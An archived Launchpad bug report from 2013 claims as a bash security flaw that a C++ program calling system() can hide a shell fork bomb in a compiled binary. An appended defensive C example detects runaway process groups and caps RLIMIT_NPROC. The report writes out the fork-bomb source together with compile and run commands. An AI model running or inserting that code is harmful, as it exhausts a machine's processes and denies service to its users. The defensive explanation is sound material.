[Bug 1101691] [NEW] Security alert: Concealment of shell fork bomb inside compiled code

Kenny Strawn 1101691 at bugs.launchpad.net
Sat Jan 19 07:20:19 UTC 2013


*** This bug is a security vulnerability ***

Public security bug reported:

$ gedit bomb.cpp
> #include <iostream>
> #include <cstdio>
> #include <cstdlib>
>
> using namespace std;
> 
> int main() {
>   system("./bomb|./bomb&");
>   return 0;
> }

$ g++ bomb.cpp -o bomb
$ ./bomb

As can be seen, it's VERY easy to use the "system" function as a means
of hiding a shell fork bomb inside an object file -- a chilling tale
indeed.

ProblemType: Bug
DistroRelease: Ubuntu 12.10
Package: bash 4.2-5ubuntu1
Uname: Linux 3.4.0 x86_64
ApportVersion: 2.6.1-0ubuntu9
Architecture: amd64
Date: Fri Jan 18 23:11:58 2013
InstallationDate: Installed on 2012-04-26 (267 days ago)
InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64 (20120425)
MarkForUpload: True
ProcEnviron:
 TERM=xterm
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=<set>
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: bash
UpgradeStatus: Upgraded to quantal on 2013-01-17 (1 days ago)

** Affects: bash (Ubuntu)
     Importance: Undecided
         Status: New


** Tags: amd64 apport-bug quantal running-unity

** Attachment added: "Object file that the source code in post compiles to"
   https://bugs.launchpad.net/bugs/1101691/+attachment/3488436/+files/bomb

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to bash in Ubuntu.
https://bugs.launchpad.net/bugs/1101691

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1101691/+subscriptions
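The report above compiles a shell fork bomb into a binary by way of system(), which simply hands its string to /bin/sh -c; nothing about that is specific to bash, and the control that actually contains it is the kernel's per-user process limit (RLIMIT_NPROC, what `ulimit -u` sets) together with watching the process table for one user spawning many copies of the same command. The C program below is an added example written for this page, not code from the reporter or from the bash package: find_runaway_groups() tallies a process listing in the layout of `ps -eo user,pid,ppid,comm` and flags every (user, command) group with more than a threshold of processes, and cap_process_count() lowers the calling process's soft RLIMIT_NPROC the way `ulimit -u` does. The function names, the sample listing, its user names and the "bomb" command name are all this example's own assumptions (the sample is constructed, not captured from a real system).

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>

#define MAX_NAME   32
#define MAX_GROUPS 64

/* Number of processes seen for one (user, command) pair. */
struct group_count {
    char user[MAX_NAME];
    char comm[MAX_NAME];
    int  count;
};

/* Constructed sample in the layout of `ps -eo user,pid,ppid,comm`; users,
 * pids and the "bomb" command name are made up for this example. "alice"
 * owns six copies of one binary, each spawned by a sibling, which is what a
 * `./bomb|./bomb&` loop looks like from outside. */
static const char *SAMPLE_PS =
    "USER       PID  PPID COMMAND\n"
    "root         1     0 init\n"
    "root       412     1 sshd\n"
    "alice     2001   412 bash\n"
    "alice     2002  2001 bomb\n"
    "alice     2003  2002 bomb\n"
    "alice     2004  2002 bomb\n"
    "alice     2005  2003 bomb\n"
    "alice     2006  2003 bomb\n"
    "alice     2007  2004 bomb\n"
    "bob       3001   412 bash\n"
    "bob       3002  3001 vim\n"
    "bob       3003  3001 vim\n";

/* Tally processes per (user, command). Returns the number of distinct groups,
 * or -1 if more than max_groups occur. The header line and any malformed
 * line fail the four-field parse and are skipped. */
static int tally_groups(const char *listing, struct group_count *groups, int max_groups)
{
    int ngroups = 0;
    const char *p = listing;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        size_t len = full < 255 ? full : 255;       /* clip over-long lines */
        char line[256], user[MAX_NAME], comm[MAX_NAME];
        int pid, ppid, i;

        memcpy(line, p, len);
        line[len] = '\0';
        p = nl ? nl + 1 : p + full;

        if (sscanf(line, "%31s %d %d %31s", user, &pid, &ppid, comm) != 4)
            continue;

        for (i = 0; i < ngroups; i++)
            if (strcmp(groups[i].user, user) == 0 && strcmp(groups[i].comm, comm) == 0)
                break;
        if (i == ngroups) {
            if (ngroups == max_groups)
                return -1;
            strcpy(groups[i].user, user);           /* both fit in MAX_NAME */
            strcpy(groups[i].comm, comm);
            groups[i].count = 0;
            ngroups++;
        }
        groups[i].count++;
    }
    return ngroups;
}

/* Flag every (user, command) group with more than `threshold` processes.
 * Flagged groups are copied to `out` (pass NULL to only count them).
 * Returns the number flagged, or -1 on overflow. */
int find_runaway_groups(const char *listing, int threshold,
                        struct group_count *out, int max_out)
{
    struct group_count groups[MAX_GROUPS];
    int n = tally_groups(listing, groups, MAX_GROUPS);
    int flagged = 0, i;

    if (n < 0)
        return -1;
    for (i = 0; i < n; i++) {
        if (groups[i].count <= threshold)
            continue;
        if (out) {
            if (flagged == max_out)
                return -1;
            out[flagged] = groups[i];
        }
        flagged++;
    }
    return flagged;
}

/* Lower this process's soft RLIMIT_NPROC, the control `ulimit -u` sets: once
 * the real user owns that many processes, fork() fails with EAGAIN, so a
 * `./x|./x&` loop stalls instead of exhausting the machine. The hard limit
 * is left alone and the soft limit is never raised above it. The kernel
 * skips this check for processes holding CAP_SYS_RESOURCE (root), so it
 * protects unprivileged accounts only. Returns the soft limit now in
 * effect, or -1 on failure. */
long cap_process_count(unsigned long max_procs)
{
    struct rlimit rl;

    if (getrlimit(RLIMIT_NPROC, &rl) != 0)
        return -1;
    if (rl.rlim_max != RLIM_INFINITY && max_procs > rl.rlim_max)
        max_procs = rl.rlim_max;
    rl.rlim_cur = max_procs;
    if (setrlimit(RLIMIT_NPROC, &rl) != 0 || getrlimit(RLIMIT_NPROC, &rl) != 0)
        return -1;
    return (long)rl.rlim_cur;
}

int main(void)
{
    struct group_count hits[MAX_GROUPS];
    int n = find_runaway_groups(SAMPLE_PS, 5, hits, MAX_GROUPS), i;

    for (i = 0; i < n; i++)
        printf("possible fork bomb: user=%s command=%s processes=%d\n",
               hits[i].user, hits[i].comm, hits[i].count);
    printf("RLIMIT_NPROC soft limit now %ld\n", cap_process_count(256));
    return n < 0;
}
```

On the sample listing the threshold of 5 flags only alice's six "bomb" processes; bob's two editors stay below it. The same cap that cap_process_count() applies from inside a program is what a hardened account gets from `ulimit -u` or the nproc line in limits.conf, and it applies whether the loop was typed into a shell or wrapped in a system() call, which is why the compiled wrapper adds no capability beyond the shell one-liner.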